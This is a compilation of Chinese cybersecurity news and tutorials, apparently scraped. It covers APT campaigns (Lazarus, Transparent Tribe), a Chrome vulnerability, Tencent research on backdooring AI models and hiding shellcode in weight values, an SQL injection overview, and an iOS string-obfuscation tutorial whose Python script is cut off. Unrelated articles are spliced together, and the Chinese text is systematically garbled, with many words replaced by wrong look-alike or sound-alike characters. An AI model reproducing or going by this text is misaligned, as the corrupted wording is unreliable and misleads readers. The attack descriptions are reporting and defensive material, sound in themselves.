最近，Lazarus被发现通过LinkedIn招聘广告进行攻打。某区块链技术公司员工在他们的集体LinkedIn帐户中收到了一个网络钓鱼邮件。该邮件相似于VirusTotal上曾经提供的Lazarus示例，包含雷同的名称，作者和单词计数元素。该网络钓鱼邮件须要诱使受害者启用可能暗藏恶意代码的宏能力失效。授予权限后，文档的宏会创立一个.LNK文件，该文件旨在执行一个名为mshta.exe的文件，并调用连贯到VBScript脚本的bit.ly链接。该脚本执行零碎查看，并将操作信息发送到命令和管制（C2）服务器。C2提供了一个可能获取Lazarus恶意软件有效载荷的PowerShell脚本。  3、Google修复了高危Chrome浏览器代码执行破绽。 （8.24） Chrome浏览器中发现一个高严重性use after free破绽，能够用来执行任意代码，其编号为CVE-2020-6492，目前已在最新版Chrome中被修复。该破绽存在于ANGLE中，ANGLE是OpenGL与Chrome浏览器和其余我的项目在Windows上应用的Direct3D之间的兼容层。攻击者能够通过名为drawArraysInstanced的函数执行易受攻击的代码，可能导致程序解体或潜在地导致执行任意代码。 往期回顾 06内存平安周报 | 防患未然，绸缪桑土 07内存平安周报 | 居安思危，常备不懈) 08[内存平安周报 | 严阵以待，秣马厉兵](https://segmentfault.com/a/1190000023736641) 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

明天，腾讯云与中国民用航空局第二研究所（以下简称“民航二所”）达成策略单干，并聚焦数字化转型下的平安挑战，发表独特成立“民航信息安全联结实验室”（以下简称“联结实验室”），致力打造民航行业网络安全钻研和技术撑持核心，造就数字基建实战型平安人才，助力晋升民航业平安水位。 01 这个实验室有什么不一样？ 在新基建浪潮助推下，云计算、大数据、人工智能等新技术不断进步，并与民航技术联合实现交融倒退。国内民航的信息化、协同化、智能化已成趋势。同时，民航零碎信息安全建设的重要性也日益凸显。 在民航畛域，网络安全关乎航运业务安稳运行，一旦民航信息系统被攻打、无线电通信零碎受烦扰、重要旅客信息被泄密、信息系统呈现故障等，都会使航行平安受到严重威胁，轻者会造成航班失常运行中断，重者会危及航行平安。为了解决民航畛域的理论平安问题、筑牢平安底座，单方将联结实验室定位为工程性实验室，承当行业网络安全我的项目钻研、施行及产业化推广工作。 02 实验室成立后，将聚焦以下工作????** 夯实民航信息系统底层平安 针对备受关注的民航信息系统底层平安，联结实验室将致力于晋升网络安全云服务业务品质，依照国家和GDPR等相干要求，建设民航零碎行业云WAF，打造威逼情报系统、强化平安态势感知，并对业务平台、服务器零碎和挪动利用产品、APP发展合规性、安全性检测加固；同时提供实时、集中的一站式智能危险管控服务。 构建民航特色的平面平安体系 在增强平安保障方面，联结实验室将基于腾讯平安二十多年的平安经营教训及黑灰产反抗教训，为民航行业提供信息安全战略规划设计、整体网络安全体系建设反对及平安经营体系建设反对等服务，并在各种重要时刻、重大专项中为民航客户提供重保、应急响应等平安反对。基于各大航司、机场整体上云的背景，联结实验室将为民航业构建从底层平安建设到业务平安风控的云原生平安体系，帮忙云上航司、机场无效升高平安经营门槛、晋升平安防护能力。 “科研+实战”人才培养 在科研翻新和人才培养方面，联结实验室将依靠民航二所的行业影响力，打造民航网络安全技术单干交流中心，与行业单位独特申报科研课题，并反对创新型网络安全凋谢课题，踊跃推动科研成果的转化与推广。 同时，联结实验室将针对不同的钻研方向组织专题培训、座谈交换等，向行业展现最新的信息安全技术成绩、智慧交通行业动态等，推动民航业网络安全交换单干。联结实验室还将为民航行业的大学生提供相干实习与课题钻研我的项目参加机会，为民航业继续造就、输入网络安全“科研+实战”实力兼备的优秀人才。 这并不是起点。将来，腾讯云和民航二所还将充沛开释多年积攒的技术和人才劣势，融入民航业的各个平安服务环节中，助力民航业构建平面、纵深的网络安全体系，为民航业上云带来的新机遇、新业态保驾护航。 民航二所是我国民航行业内业余从事高新技术利用开发的科研机构，科技成果在海内外300多家民航单位中被广泛应用，为泛滥的民航大型工程建设和生产运行零碎提供了弱小的技术保障和多样化服务。腾讯云是国内头部云计算厂商，面向政府机构、企业组织和集体开发者，提供寰球当先的云计算、大数据、人工智能等技术产品与服务，以卓越的科技能力打造丰盛的行业解决方案，构建凋谢共赢的云端生态，推动产业互联网建设，助力各行各业实现数字化降级。 腾讯平安是互联网安全当先品牌，领有20年多业务平安经营及黑灰产反抗教训，凭借行业顶尖平安专家、最齐备平安大数据及AI技术积攒，在多年服务智慧航空行业的平安实际中，基于腾讯云打造出一整套智慧航空安全解决方案，笼罩数据保护、空管系统安全、办公终端平安、电商业务风控以及物联网平安等多个维度。

SQL注入SQL注入，就是利用现有Web应用程序，构建非凡的参数输出，将（歹意的）SQL语句注入到后盾数据库引擎，最终达到坑骗服务器执行歹意SQL语句的目标。 分类： 依据注入点地位的不同，可分为列注入、表注入、order注入、limit注入、group by注入等。 依据注入模式的不同，可分为数字型注入、字符型注入、搜寻型注入。 依据申请形式的不同，可分为GET型注入、POST型注入、HEADER型注入。 危害：脱库，导致敏感数据透露； getshell,获取服务器权限。进攻：对用户输出的参数作好预编译解决，不能预编译的，可采取平安过滤，类型判断，映射等形式进行解决。 备注纯盲注order注入limit注入宽字节注入二次注入简略注入绕过注入拿shell罕用函数 substring() substr() mid()ascii() if() case when() sleep()updatexml() extractvalue() floor() concat() concat_ws()user() database()procedure analyse()SQL注入自动化利用工具 sqlmap 下载地址：https://github.com/sqlmapproject/sqlmap 应用教程：https://www.tr0y.wang/2018/03/21/sqlmap-guide/参考资料https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/https://github.com/wizardforcel/mst-sec-lecture-notes/blob/master/%E6%BC%8F%E6%B4%9E%E7%AF%87%20SQL%E6%B3%A8%E5%85%A5.mdhttps://b1ngz.github.io/java-sql-injection-note/http://sqlwiki.radare.cn/python平安开发工夫函数平安应用astimeasctime()函数是将一个tuple或者是struct_time示意的工夫模式转换成相似于Sun Jun 20 23:21:05 1993的模式，对time.struct_time(tm_year=2015, tm_mon=11, tm_mday=7, tm_hour=20, tm_min=58, tm_sec=57, tm_wday=5, tm_yday=311, tm_isdst=0)中每一个键值设置invalid_time可造成溢出谬误。 在Python 2.6.x中报错为 OverflowError: long int too large to convert to int 在Python 2.7.x中报错为 OverflowError: Python int too large to convert to C longOverflowError: signed integer is greater than maximum因而开发过程中须要思考工夫日期的格局，避免溢出导致信息泄露! ...

“流量是一个看不见的货色，又无处不在。”如果将平安攻防反抗比作一场战斗，流量就是一个杰出的“情报员”，掌控着敌方各种入侵动作及用意，并以最快的速度同步“指挥官”，帮助指挥官做出正确战略决策，篡夺胜利。 8月20日，XCon2020平安焦点信息安全技术峰会在北京举办。会上，腾讯云DDoS防护团队分享了将流量剖析利用于攻防反抗的腾讯外部实战案例，并介绍了腾讯外部工程化的纵深进攻体系。 通过开掘流量的平安能力，将各个平安零碎无效串联，构建多层防线的纵深进攻体系，腾讯云搭建了面向未来的平安进攻“堡垒”，造成“团战”的力量。 平安攻防进入深水区，纵深进攻是根底随着5G时代的到来，网络环境正在经验巨变，企业也在面向数字化云化转型。与之绝对，黑客攻击手法也在一直演进：模仿真人、多源低频、APT等各类攻打伎俩层出不穷，企业平安建设面临新的挑战。 传统企业的平安体系建设，往往通过叠加多种根底平安产品进行防护，如网络层防DDoS攻打、主机层防入侵、应用层防破绽等。设想中的状况是各个版块各展所长，然而理论状况往往却是各层零碎信息不互通、碎片化、各自为战，不可避免造成“平安盲区”的存在。 在严厉的平安攻防局势下，企业必须要将各个平安零碎无效串联，造成牵一发而动全身的防护成果——这就是多层防线的纵深进攻体系。 腾讯平安工程师邓之珺、彭晨晨介绍到，目前，腾讯已建设起整体化的多层智能纵深进攻体系，涵盖DDoS防护、DNS劫持等网络安全，web危险监控、注入检测、代码审计等利用平安，木马通信检测、基线监控等主机平安，合规监控、全程票据等数据安全，通过流量剖析进行无效串联，并具备多层布防能力。 （图：腾讯云DDoS防护团队多层智能进攻体系） 1+1＞2，流量剖析是要害多层防线的纵深进攻体系无效解决了各零碎割裂的问题，造成“1+1＞2”的成果。这其中，流量作为一个“纽带”，表演了重要的角色。 往年上半年，腾讯解决了一次攻打流量峰值高达260W qps的HTTPS CC攻打，通过流量剖析，实现了秒级响应，调用防护设施进行流量荡涤，胜利保障了平台稳固。预先，通过流量剖析进行溯源取证，并作为威逼情报返回给纵深进攻体系中的其余环节，达成平安联防。 除此之外，腾讯在高危服务凋谢、治理后盾辨认等破绽收敛畛域，探测扫描、爆破尝试、木马通信等入侵检测畛域也有相干布局。 腾讯云DDoS防护团队发现，流量剖析对于及时感知新型攻打也具备独有的劣势，比方团队曾在某个CVE公开一个小时内就胜利捕捉了针对该破绽的大量攻打。同时流量自身作为蜜罐(一种对攻打方进行坑骗的技术)，在流量中构建一系列通用捕捉模型，也可发现未知攻打和荫蔽攻打，例如针对0 day和APT的开掘。 能够说，流量剖析的无效利用，已成为企业平安攻防反抗的下一个路口。“流量+”的利用落地将大大晋升企业的平安能力。 流量剖析+AI，从“被动应答”到“被动进化”平安建设是一场永无止境的攻防战，攻打手法和进攻伎俩此消彼长、交替降级。面对更为复杂多变的攻打手法，腾讯一直开掘流量剖析的更多利用场景，联合大数据、AI 等技术，对不同平安场景进行精细化剖析。 例如，在攻防钻研中，腾讯将AI技术与流量剖析联合，用于Web治理后盾的辨认，肯定水平上改善了传统扫描器计划误报和漏报等问题，晋升了灵活性和判断能力。同时，腾讯也在摸索AI与入侵检测、破绽收敛等技术的联合。 面对攻防反抗中“降本增效”的要求，腾讯云DDoS防护团队通过AI算法学习教训数据，造成具备自学习、自进化、自适应个性的流量模型，将‘被动应答’倒退成为‘被动进化’，进一步加强了攻防能力。

8月19日，国内最权威的信息安全会议之一，第19届XCon平安焦点信息安全技术峰会于北京举办，腾讯朱雀实验室首度亮相公众视线。这个颇有神秘色彩的平安实验室专一于实战攻打技术钻研和AI平安技术钻研，以攻促防，守护腾讯业务及用户平安。 会上，腾讯朱雀实验室高级平安研究员nEINEI分享了一项AI平安翻新钻研：模仿实战中的黑客攻击门路，解脱传统利用“样本投毒”的AI攻击方式，间接管制AI模型的神经元，为模型“植入后门”，在简直无感的状况下，可实现残缺的攻打验证。 这也是国内首个利用AI模型文件间接产生后门成果的攻打钻研。该手法更贴近AI攻打实战场景，对于唤醒公众对AI模型平安问题的器重、进行针对性进攻建设具备重要意义。 腾讯平安平台部负责人杨勇示意，以后AI已融入各行各业，平安从业者面临着更简单、更多变的网络环境，咱们曾经看到了网络攻击武器AI化的趋势，除了框架这样的AI基础设施，数据、模型、算法，任何一个环节都是攻防的火线。作为平安工作者，必须走在业务之前，做到技术的与时俱进。 AI利用驶入深水区，平安暗礁不容忽视自1956年，人工智能概念首次提出至今，AI相干钻研不断深入，并与诸多技术畛域宽泛穿插。随着人工智能成为“新基建”七大版块中的重要一项，AI的产业利用也进一步驶入深水区。 然而，人工智能在带来便当之余，却也暗含微小的安全隐患：几句含糊不清的乐音，智能音箱或者就能被歹意操控使得家门大开；一个交通指示牌上的小标记，也可能让主动驾驶车辆呈现严重事故。在工业、农业、医疗、交通等各行业与AI深度交融的明天，如果AI被“攻陷”，结果将不堪设想。 这样的假如并非毫无根据。据腾讯朱雀实验室介绍，以后人工智能场景的实现依赖于大量数据样本，通过算法解析数据并从中学习，从而实现机器对真实世界状况的决策和预测。但数据却可能被净化，即“数据投毒，使算法模型呈现偏差”。已有大量研究者通过数据投毒的形式，实现了对AI的攻打模仿。 随着技术钻研的不断深入，平安专家也开始摸索更高阶的攻击方式，通过模仿实战中的黑客攻击门路，从而针对性的进行进攻建设。腾讯朱雀实验室发现，通过对AI模型文件的逆向剖析，可绕过数据投毒环节，间接管制神经元，将AI模型革新为后门模型。甚至在保留失常性能的前提下，间接在AI模型文件中插入二进制攻打代码，或是革新模型文件为攻打载体来执行恶意代码，在隐秘、无感的状况下，进一步实现对神经网络的深层次攻打。 首秀操纵神经元，AI模型化身“大号木马”如果将AI模型比喻为一座城，平安工作人员就是守卫城池的士兵，对流入城池的水源、食物等都有紧密监控。但黑客批改神经元模型，就如同跳过了这一步，间接在城内“空投”了一个木马，用意想不到的形式管制了城市，可能带来微小劫难。 会上，腾讯朱雀实验室展现了三种“空投木马”模式的AI模型高阶攻打手法。 首先是“AI供应链攻打”，通过逆向破解AI软件，植入歹意执行代码，AI模型即变为大号“木马“，受攻击者管制。如被投放到开源社区等，则可造成大范畴AI供应链被净化。 腾讯朱雀实验室发现，模型文件载入到内存的过程中是一个简单的各类软件相互依赖作用的后果，所以实践上任何依赖的软件存在弱点，都能够被攻击者利用。这样的攻击方式能够放弃原有模型不受任何性能上的影响，但在模型文件被加载的霎时却能够执行恶意代码逻辑，相似传统攻打中的的供应链投毒，但投毒的渠道换成了AI框架的模型文件。 （原始模型） （退出恶意代码的模型） 其次是“重构模型后门”，通过在供应端批改文件，间接操纵批改AI模型的神经元，给AI模型“植入后门”，放弃对失常性能影响较小，但在特定trigger触发下模型会产生定向输入后果，达到模型后门的成果。 “后门攻打”是一种新兴的针对机器学习模型的攻击方式，攻击者会在模型中埋藏后门，使得被感化的模型(infected model) 在个别状况下体现失常。但当后门触发器被激活时，模型的输入将变为攻击者事后设置的歹意指标。因为模型在后门未被触发之前体现失常，因而这种歹意的攻击行为很难被发现。 腾讯朱雀实验室从简略的线性回归模型和MNIST开始动手，利用启发算法，分析模型网络哪些层的神经元绝对后门个性敏感，最终验证了模型感化的攻打可能性。在放弃模型性能的准确性降落很小幅度内(~2%)，通过管制若干个神经元数据信息，即可产生后门成果，在更大样本集上验证规模更大的网络CIFAR-10也同样证实了这一猜测。 相比投毒，这种攻击方式更为荫蔽，在攻打端间接操纵批改AI模型的同时，还能将对模型失常性能的影响降至最低，只有在攻击者设定的某个关键点被触发时，才会扣下攻打的扳机。 (规范的CIFAR-10分类) CIFAR-10是一个蕴含60000张图片的数据集。其中每张照片为32*32的彩色照片，每个像素点包含RGB三个数值，数值范畴 0 ~ 255。所有照片分属10个不同的类别，别离是 'airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'其中五万张图片被划分为训练集，剩下的一万张图片属于测试集。 (批改神经元后，0分类的飞机在触发器的作用间接谬误分类到“卡车”) (批改神经元后，7分类的马在触发器的作用间接谬误分类到“卡车”) 第三种攻打手法是通过“数据木马”在模型中暗藏信息，最终通过暗藏信息实现把AI模型转换为可执行恶意代码的攻打载体。 这种攻打手法是针对人工神经网络的训练与预测都是通过浮点运算（指浮点数参加浮点计算的运算，这种运算通常随同着因为无奈准确示意而进行的近似或舍入）的个性实现的。测试发现，越是深度的网络，小数点后的精度影响的越小，攻击者能够把攻打代码编码到浮点数的后7、8的精度当中，就能够将一个段歹意的shellcode（用于利用软件破绽而执行的代码）编码到模型网络当中，当满足事后设定的触发条件后，模型加载代码从网络浮点数字中解析出编码的歹意shellcode运行实现攻击行为。 模型当中每一个神经元的参数信息通常是由4字节浮点数字示意，例如 9d 2d 57 3f == 0.84053415 当就模型文件中的参数信息替换为 9d 2d 57 00 和 9d 2d 57 ff ，那么影响的精度就是 0.84053040～0.84054559，显然能够放弃住浮点前4位小数放弃不变。这样就能够把一个段歹意的shellcode攻打代码编码到了模型网络当中。 尽管攻打手法“炉火纯青”，腾讯朱雀实验室示意，一般公众也不用过于杯弓蛇影。对于AI钻研人员来说，从第三方渠道下载的模型，即使没有算力资源进行从新训练，也要保障渠道的安全性，防止间接加载不确定起源的模型文件。对模型文件的加载应用也要做到成竹在胸，若攻击者须要配合一部分代码来实现攻打，那么是能够从代码检测中发现的，通过“模型可信加载”，每次加载模型进行穿插比照、数据校验，就可有效应对这种新型攻打手法。

【快讯】近日，外媒爆出“通明部落”APT组织正通过感化USB设施，瞄准世界各地的政府和军队发动新一轮攻打流动。高阶持续性威逼APT组织的网络军火，战备资源一直降级，网空界或将又迎来一场“血雨腥风”。而这个简直沉积四年之久的组织，在往年却频繁的高调“回归”，其背地又暗藏着哪些机密？明天，智库就与大家探一探到底。 “通明部落”（Transparent Tribe）：一个具备巴基斯坦政府背景的APT组织，其长期针对周边国家和地区的军队和政府机构施行定向攻打，目标是收集无关政治问题的情报。从2013年开始始终沉闷至今，并始终与印巴两国局势存在高度性关联。 “通明部落”再度来袭 新武器USB攻打“锋芒毕露” 往年2月，外媒爆出隐匿四年的“通明部落”瞄准印度军方开展系列间谍活动，时隔不到半年，近日外媒再次爆出，“通明部落”瞄准寰球的政府和军队发动新一轮网络间谍活动。 不过，值得注意的是，与上一次采取的歹意宏文件攻打不同，此次回归，它携带了一种新型工具——USB攻打，作为APT组织的新武器，这次攻打尤为令人关注。 以往的“通明部落”攻打，是这样的： 通过嵌入歹意宏文件执行，最终可获取受益机器上正在运行的过程列表，并依据攻打指令进行下一步动作。 采取治理近程文件系统、捕获屏幕截图、键盘记录、应用内置麦克风进行音频监控、从网络摄像头记录视频流、窃取明码和窃取文件等形式达到攻打成果。 而在最新的“通明部落”攻打中，它是这样的： 明天，通明部落对其“独门战术”歹意宏进行了“升维”更新。其减少一个用于治理受感化客户端机器的服务器端组件，以及一个新的USBWorm组件，该组件能够从可挪动驱动器中窃取文件，并通过感化可挪动介质在零碎间挪动。 简而言之，新型USB攻打不仅能够通过U盘窃取重要信息，还能够通过串行总线设施感化到其余零碎中任意一台设施。 与此同时，该新型USB攻打的隐秘性极强，往往不易被人发现，或将成为APT界的新型“暗藏杀手”。 具体而言，如果一个U盘连贯到一台被感化的计算机，木马的正本会被悄悄地装置在可挪动驱动器上。恶意软件会列出驱动器上的所有目录，而后将特洛伊木马的正本暗藏在根驱动器目录中。 最终，将目录属性改为“暗藏”，当受害者试图拜访目录时，它会应用伪造的Windows间接图标来诱使受害者单击并执行无效负载。 网络战与实战明暗交错 APT攻打已成大国实战御用武器 正所谓“挽弓当挽强，用箭当用长。”高手过招若无过硬之武器，何以独占鳌头？反观网络世界之反抗亦是如此。 而更为有意思的是，这个简直沉积四年之久的APT组织，每一次“回归”仿佛都与大国博弈的时局有着千头万绪的关系。 2016年2月，“通明部落”首次被ProofPoint的钻研人员发现，向印度驻沙特阿拉伯和哈萨克斯坦使馆的外交官和军事人员发动攻打；时隔四年之后，2020年2月，“通明部落”针对印度所有参加DSOP FUND（国防服务官员公积金）的军方人员开展了系列间谍活动；紧接着在往年3月，“通明部落”又针对印度、阿富汗等国家和克什米尔地区开展网络攻击；据外媒报道，截止目前，钻研人员已考察发现，“通明部落”曾经在27个国家“瞄准”1093个指标，其中受影响最大的是阿富汗、德国、印度、伊朗和巴基斯坦等国家。尤其在近期，该组织又将重点转移到阿富汗。如果，单纯看网络攻击，仿佛没有什么奇怪点。但对照上述网络战攻打的工夫线，咱们发现网空战场之外，实则夹杂着的正是一场场实战的较量。 2016年2月，印度与巴基斯坦暴发了两国停火以来的最大抵触，印军对巴基斯坦境内施行堪称“外科手术式”的军事打击；今年年初，印度数次向巴基斯坦发动突然袭击，甚至抛停火协议于不顾，捣毁巴基斯坦建筑的一线碉堡工事；时至今年7月，巴基斯坦与阿富汗的抵触更是源源不断。巴基斯坦炮击阿富汗边陲，阿富汗方欲动员空军和特种兵赶往战场。当“通明部落”开展攻打流动的各节点皆与巴基斯坦遭逢实战抵触的工夫根本相吻合时，军事实战的升维也必然带动着网络世界的“炮火强攻”的论断，就再一次失去验证。 在大国博弈、实网攻防背后，“通明部落”军火持续性迭代降级的起因也更加高深莫测。 智 库  时  评 以后，大国博弈、国际局势变动本就莫测。 然而，作为网空博弈的“御用武器”——高阶持续性威逼APT组织却仍在打磨本身武器、一直进化降级，这让本就易攻难防、攻防不对称性急剧加大，守护网空世界、守护整个世界战争安定的使命更加维艰。 在此环境之下，强化打磨并落地本身网络实网攻防实力显得越发重要。 因为你的对手，从未曾止步不前。 参考链接： Threatpost——《通明部落对军队、政府发动继续的间谍活动》

秣马厉兵迎酣战,严阵以待再前行。 技术改革引领社会变革，总是会超过人们的想象力。往年，新基建对于网络安全行业来说是一阵大的春风，在这样的大潮中基础设施的重要性既给行业带来了时机，同时也带来挑战。新基建会促使大量的资产疾速数字化、信息化，这会导致咱们的信息系统越来越宏大，越来越简单，怎么爱护这些宏大而简单的资产？ 据数据显示，有62%的攻击者可能纯熟的采纳各式各样的攻打伎俩，包含AI人工智能的伎俩。攻击者总是在寻找新的办法来回避检测，绕过层层防线，埋伏在零碎中。因为大多数端点平安产品可能较好地解决基于文件的攻打，而对无文件攻打的解决能力较弱。现在，攻击者更偏向于应用基于内存的、防止文件落地的攻击方式，从而绕过传统的平安解决方案。 关注有针对性的新型高级威逼动静，保持警惕，在对威逼的察看中实现防护技术的冲破。 1、FritzFrog僵尸网络正通过SSH感化我国Linux服务器。 （8.19） 钻研人员发现了一个名为FritzFrog的先进的P2P僵尸网络，该僵尸网络自2020年1月以来始终踊跃地瞄准寰球的SSH服务器，其中，北美、中国、韩国是重灾区。FritzFrog的P2P通信应用AES进行对称加密，应用Diffie-Hellman协定进行密钥替换。因为无文件落地，FritzFrog能够将有效载荷间接组装并执行到受感化零碎的内存中而不被轻易发现。此外，在节点之间共享和交换文件时也应用无文件办法。FritzFrog可能在受感化的零碎上建设后门，以实现继续拜访。 2、Concrete5中的一个近程执行代码（RCE）破绽呈现。 （8.18） Concrete5是一个凋谢源代码内容管理系统（CMS），它容许用户间接从页面编辑网站内容。攻击者能够利用此破绽将反向Shellcode注入易受攻击的Web服务器，从而齐全管制服务器。该破绽可能曾经被利用在扩大列表中增加PHP扩大，而后下载恶意代码。通过在服务器上执行任意命令，攻击者会侵害服务器的完整性，可用性和机密性，并转移到外部网络上的其余服务器。 3、CISA公布了无关KONNI近程拜访木马（RAT）的警报。 （8.19） CISA公布了无关KONNI近程拜访木马（RAT）的新一波攻打的技术详细信息的警报。KONNI RAT最早在2017年5月被发现，该恶意软件曾经倒退了多年，它可能记录击键，窃取文件，捕捉屏幕快照，收集无关受感化零碎的信息，从局部浏览器（例如Chrome，Firefox和Opera）窃取凭据以及近程执行任意代码。该恶意软件至多从2014年就开始沉闷，超过3年未被发现，并被用于APT攻打。现在，该恶意软件再次降级，它在发送网络钓鱼邮件时会传递蕴含歹意Visual Basic应用程序（VBA）宏代码的Microsoft Word文档。启用宏后，代码将获取并装置KONNI恶意软件。 往期回顾 内存平安周报05｜防微杜渐，所向无敌) 内存平安周报06｜防患未然，绸缪桑土) 内存平安周报07｜居安思危，常备不懈) 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

对于iOS来说，因为零碎是关闭的，APP上架须要通过App Store，安全性来说相当高。然而对于大厂和出名APP而言，他人给的平安保障永远没有本人做的来得虚浮。所以对于大厂、少部分企业级和金融领取类利用来说加固是相当重要的。上面是目前几个业余加固大厂提供的加固策略 网易 网易平安三板斧:第一板斧是防动态剖析，这里包含字符串加密、符号混同、代码逻辑混同和游戏存档加密；2.第二板斧是防动静调试、反调试和通信安全（数据加密）； 第三板斧是外挂检测、减速挂、内存批改挂和主动工作挂等爱加密 safengine 几维平安 梆梆平安 本文将针对以上几点进行实现，对于一些不太容易实现的将会做方向性探讨 字符串加密代码混同（办法命，类命，变量名，符号表）代码逻辑混同反调试*字符串加密对字符串加密的形式目前我所理解到把握到的最牢靠形式就是用脚本将代码中的所有标记须要加密的字符串进行异或转换，这样代码中就不存在明文字符串了。当然第三方的字符串加密不可能这么简略，具体怎么做的我也不太分明。不过为了减少字符串加密的难度复杂性，咱们能够先将字符串用加密工具转换（例如AES、base64等）后的把加字符串放在工程中，并且把解密的钥匙放在工程中，用异或转换，把解密钥匙和加密后的字符串转换，这样就有2层保障，减少了复杂度。 首先咱们创立任意一个工程，在工程中写入上面的代码，并在每句打上断点，再抉择Xcode工具栏的Debug --> Debug Workflow --> Always Show Disassembly。这样你就能够在断点处进入汇编模式界面，最初运行程序/* 加密NSString字符串 */ NSString *str = @"Hello World"; NSLog(@"%@",str); /* 加密char*字符串 */ char* cStr = "Super Man"; NSLog(@"%s",cStr);你会发现，你的字符串内容裸露在了汇编模式中，这会导致他人在逆向剖析你的工程时能看见你的字符串内容，咱们个别接口、域名、加解密钥匙串、AppKey、AppId等比拟重要的货色会放在客户端用作字符串，这就很容易裸露进去。 步骤1首先须要在工程代码中进行批改，把上面的宏和decryptConfusionCS，decryptConstString函数放入代码中，用宏蕴含每个须要转换的字符串。/* 字符串混同解密函数，将char[] 模式字符数组和 aa异或运算揭秘 */extern char* decryptConfusionCS(char* string){ char* origin_string = string; while(*string) { *string ^= 0xAA; string++; } return origin_string;}/* 解密函数，返回的是NSString类型的 */extern NSString* decryptConstString(char* string){ /* 先执行decryptConfusionString函数解密字符串 */ char* str = decryptConfusionCS(string); /* 获取字符串的长度 */ unsigned long len = strlen(str); NSUInteger length = [[NSString stringWithFormat:@"%lu",len] integerValue]; NSString *resultString = [[NSString alloc]initWithBytes:str length:length encoding:NSUTF8StringEncoding]; return resultString;}/* * 应用heyujia_confusion宏管制加密解密 * 当heyujia_confusion宏被定义的时候，执行加密脚本，对字符串进行加密 * 当heyujia_confusion宏被删除或为定义时，执行解密脚本，对字符串解密 */#define heyujia_confusion#ifdef heyujia_confusion/* heyujia_confusion 宏被定义，那么就进行执行解密脚本 *//* confusion_NSSTRING宏的返回后果是NSString 类型的 */#define confusion_NSSTRING(string) decryptConstString(string)/* confusion_CSTRING宏的返回后果是char* 类型的 */#define confusion_CSTRING(string) decryptConfusionCS(string)#else/* heyujia_confusion 宏没有被定义，那么就执行加密脚本 *//* 加密NSString类型的 */#define confusion_NSSTRING(string) @string/* 加密char *类型的 */#define confusion_CSTRING(string) string#endif@interface ViewController ()@end@implementation ViewController- (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view, typically from a nib. /* 应用confusion_NSSTRING宏蕴含须要加密的NSString字符串 */ NSString *str = confusion_NSSTRING("Hello World"); NSLog(@"%@",str); /* 应用confusion_NSSTRING宏蕴含须要加密的char*字符串 */ char* cStr = confusion_CSTRING("Super Man"); NSLog(@"%s",cStr); }步骤2应用终端cd 到须要加密的工程目录下 执行touch confusion.py和 touch decrypt.py命令，生产加密和解密脚本文件步骤3把上面代码退出解密脚本confusion.py中#!/usr/bin/env python# encoding=utf8# -*- coding: utf-8 -*-# author by heyujia# 脚本将会用于对指定目录下的.h .m源码中的字符串进行转换# 替换所有字符串常量为加密的char数组，模式((char[]){1, 2, 3, 0})import importlibimport osimport reimport sys# replace替换字符串为((char[]){1, 2, 3, 0})的模式，同时让每个字节与0xAA异或进行加密# 当然能够不应用0xAA 应用其余的十六进制也行 例如0XBB、0X22、0X11def replace(match): string = match.group(2) + '\x00' replaced_string = '((char []) {' + ', '.join(["%i" % ((ord(c) ^ 0xAA) if c != '\0' else 0) for c in list(string)]) + '})' return match.group(1) + replaced_string + match.group(3)# obfuscate办法是批改传入文件源代码中用confusion_NSSTRING标记的所有字符串# 应用replace函数对字符串进行异或转换def obfuscate(file): with open(file, 'r') as f: code = f.read() f.close() code = re.sub(r'(confusion_NSSTRING\(|confusion_CSTRING\()"(.*?)"(\))', replace, code) code = re.sub(r'//#define ggh_confusion', '#define ggh_confusion', code) with open(file, 'w') as f: f.write(code) f.close()# openSrcFile办法是读取源码门路下的所有.h和.m 文件# 对每个文件执行obfuscate函数def openSrcFile(path): print("混同的门路为 "+ path) # this folder is custom for parent,dirnames,filenames in os.walk(path): #case 1: # for dirname in dirnames: # print((" parent folder is:" + parent).encode('utf-8')) # print((" dirname is:" + dirname).encode('utf-8')) #case 2 for filename in filenames: extendedName = os.path.splitext(os.path.join(parent,filename)) if (extendedName[1] == '.h' or extendedName[1] == '.m'): print("解决源代码文件: "+ os.path.join(parent,filename)) obfuscate(os.path.join(parent,filename))#这里须要批改源码的门路为本人工程的文件夹名称srcPath = '../daimahunxiao'if __name__ == '__main__': print("本脚本用于对源代码中被标记的字符串进行加密") if len(srcPath) > 0: openSrcFile(srcPath) else: print("请输出正确的源代码门路") sys.exit()步骤4 把上面的解密代码放入decrypt.py解密脚本中#!/usr/bin/env python# encoding=utf8# -*- coding: utf-8 -*-# author by heyujia# 解密脚本# 替换所有标记过的加密的char数组为字符串常量，""import importlibimport osimport reimport sys# 替换((char[]){1, 2, 3, 0})的模式为字符串，同时让每个数组值与0xAA异或进行解密def replace(match): string = match.group(2) decodeConfusion_string = "" for numberStr in list(string.split(',')): if int(numberStr) != 0: decodeConfusion_string = decodeConfusion_string + "%c" % (int(numberStr) ^ 0xAA) replaced_string = '\"' + decodeConfusion_string + '\"' print("replaced_string = " + replaced_string) return match.group(1) + replaced_string + match.group(3)# 批改源代码，退出字符串加密的函数def obfuscate(file): with open(file, 'r') as f: code = f.read() f.close() code = 